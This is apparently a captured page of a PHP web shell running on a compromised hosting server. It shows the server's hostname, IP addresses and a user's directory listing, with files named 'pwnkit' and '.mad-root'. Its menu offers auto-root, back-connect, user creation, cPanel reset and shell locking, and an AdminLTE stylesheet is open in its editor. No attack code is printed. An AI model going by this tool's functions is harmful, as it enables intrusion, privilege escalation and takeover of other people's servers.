Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.12.148.180
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
khokhar /
myadmin /
build /
less /
[ HOME SHELL ]
Name
Size
Permission
Action
skins
[ DIR ]
drwxr-xr-x
.csslintrc
591
B
-rwxr-xr-x
.mad-root
0
B
-rw-r--r--
404_500_errors.less
702
B
-rwxr-xr-x
AdminLTE-without-plugins.less
1.54
KB
-rwxr-xr-x
AdminLTE.less
1.55
KB
-rwxr-xr-x
alerts.less
641
B
-rwxr-xr-x
bootstrap-social.less
3.2
KB
-rwxr-xr-x
boxes.less
7.92
KB
-rwxr-xr-x
buttons.less
3.06
KB
-rwxr-xr-x
callout.less
846
B
-rwxr-xr-x
carousel.less
268
B
-rwxr-xr-x
control-sidebar.less
5.37
KB
-rwxr-xr-x
core.less
2.77
KB
-rwxr-xr-x
direct-chat.less
2.98
KB
-rwxr-xr-x
dropdown.less
6.71
KB
-rwxr-xr-x
forms.less
1.85
KB
-rwxr-xr-x
fullcalendar.less
1.73
KB
-rwxr-xr-x
header.less
4.69
KB
-rwxr-xr-x
info-box.less
1.11
KB
-rwxr-xr-x
invoice.less
201
B
-rwxr-xr-x
labels.less
326
B
-rwxr-xr-x
lockscreen.less
1.12
KB
-rwxr-xr-x
login_and_register.less
707
B
-rwxr-xr-x
mailbox.less
1.19
KB
-rwxr-xr-x
miscellaneous.less
8.52
KB
-rwxr-xr-x
mixins.less
6.92
KB
-rwxr-xr-x
modal.less
1.27
KB
-rwxr-xr-x
navs.less
3.75
KB
-rwxr-xr-x
plugins.less
119
B
-rwxr-xr-x
print.less
967
B
-rwxr-xr-x
products.less
776
B
-rwxr-xr-x
profile.less
452
B
-rwxr-xr-x
progress-bars.less
1.64
KB
-rwxr-xr-x
pwnkit
0
B
-rwxr-xr-x
select2.less
2.64
KB
-rwxr-xr-x
sidebar-mini.less
3.68
KB
-rwxr-xr-x
sidebar.less
3.04
KB
-rwxr-xr-x
small-box.less
1.41
KB
-rwxr-xr-x
social-widgets.less
1.37
KB
-rwxr-xr-x
table.less
897
B
-rwxr-xr-x
timeline.less
1.91
KB
-rwxr-xr-x
users-list.less
602
B
-rwxr-xr-x
variables.less
3.04
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : variables.less
//AdminLTE 2 Variables.less //========================= //PATHS //-------------------------------------------------------- @boxed-layout-bg-image-path: "../img/boxed-bg.jpg"; //COLORS //-------------------------------------------------------- //Primary @light-blue: #3c8dbc; //Danger @red: #dd4b39; //Success @green: #00a65a; //Info @aqua: #00c0ef; //Warning @yellow: #f39c12; @blue: #0073b7; @navy: #001F3F; @teal: #39CCCC; @olive: #3D9970; @lime: #01FF70; @orange: #FF851B; @fuchsia: #F012BE; @purple: #605ca8; @maroon: #D81B60; @black: #111; @gray-lte: #d2d6de; //LAYOUT //-------------------------------------------------------- //Side bar and logo width @sidebar-width: 230px; //Boxed layout maximum width @boxed-layout-max-width: 1024px; //When the logo should go to the top of the screen @screen-header-collapse: @screen-xs-max; //Link colors (Aka: <a> tags) @link-color: @light-blue; @link-hover-color: lighten(@link-color, 15%); //Body background (Affects main content background only) @body-bg: #ecf0f5; //SIDEBAR SKINS //-------------------------------------------------------- //Dark sidebar @sidebar-dark-bg: #222d32; @sidebar-dark-hover-bg: darken(@sidebar-dark-bg, 2%); @sidebar-dark-color: lighten(@sidebar-dark-bg, 60%); @sidebar-dark-hover-color: #fff; @sidebar-dark-submenu-bg: lighten(@sidebar-dark-bg, 5%); @sidebar-dark-submenu-color: lighten(@sidebar-dark-submenu-bg, 40%); @sidebar-dark-submenu-hover-color: #fff; //Light sidebar @sidebar-light-bg: #f9fafc; @sidebar-light-hover-bg: lighten(#f0f0f1, 1.5%); @sidebar-light-color: #444; @sidebar-light-hover-color: #000; @sidebar-light-submenu-bg: @sidebar-light-hover-bg; @sidebar-light-submenu-color: #777; @sidebar-light-submenu-hover-color: #000; //CONTROL SIDEBAR //-------------------------------------------------------- @control-sidebar-width: @sidebar-width; //BOXES //-------------------------------------------------------- @box-border-color: #f4f4f4; @box-border-radius: 3px; @box-footer-bg: #fff; @box-boxshadow: 0 1px 1px rgba(0, 0, 0, .1); @box-padding: 10px; //Box variants @box-default-border-top-color: #d2d6de; //BUTTONS //-------------------------------------------------------- @btn-boxshadow: none; //PROGRESS BARS //-------------------------------------------------------- @progress-bar-border-radius: 1px; @progress-bar-sm-border-radius: 1px; @progress-bar-xs-border-radius: 1px; //FORMS //-------------------------------------------------------- @input-radius: 0; //BUTTONS //-------------------------------------------------------- //Border radius for non flat buttons @btn-border-radius: 3px; //DIRECT CHAT //-------------------------------------------------------- @direct-chat-height: 250px; @direct-chat-default-msg-bg: @gray-lte; @direct-chat-default-font-color: #444; @direct-chat-default-msg-border-color: @gray-lte; //CHAT WIDGET //-------------------------------------------------------- @attachment-border-radius: 3px; //TRANSITIONS SETTINGS //-------------------------------------------------------- //Transition global options @transition-speed: .3s; @transition-fn: ease-in-out;
Close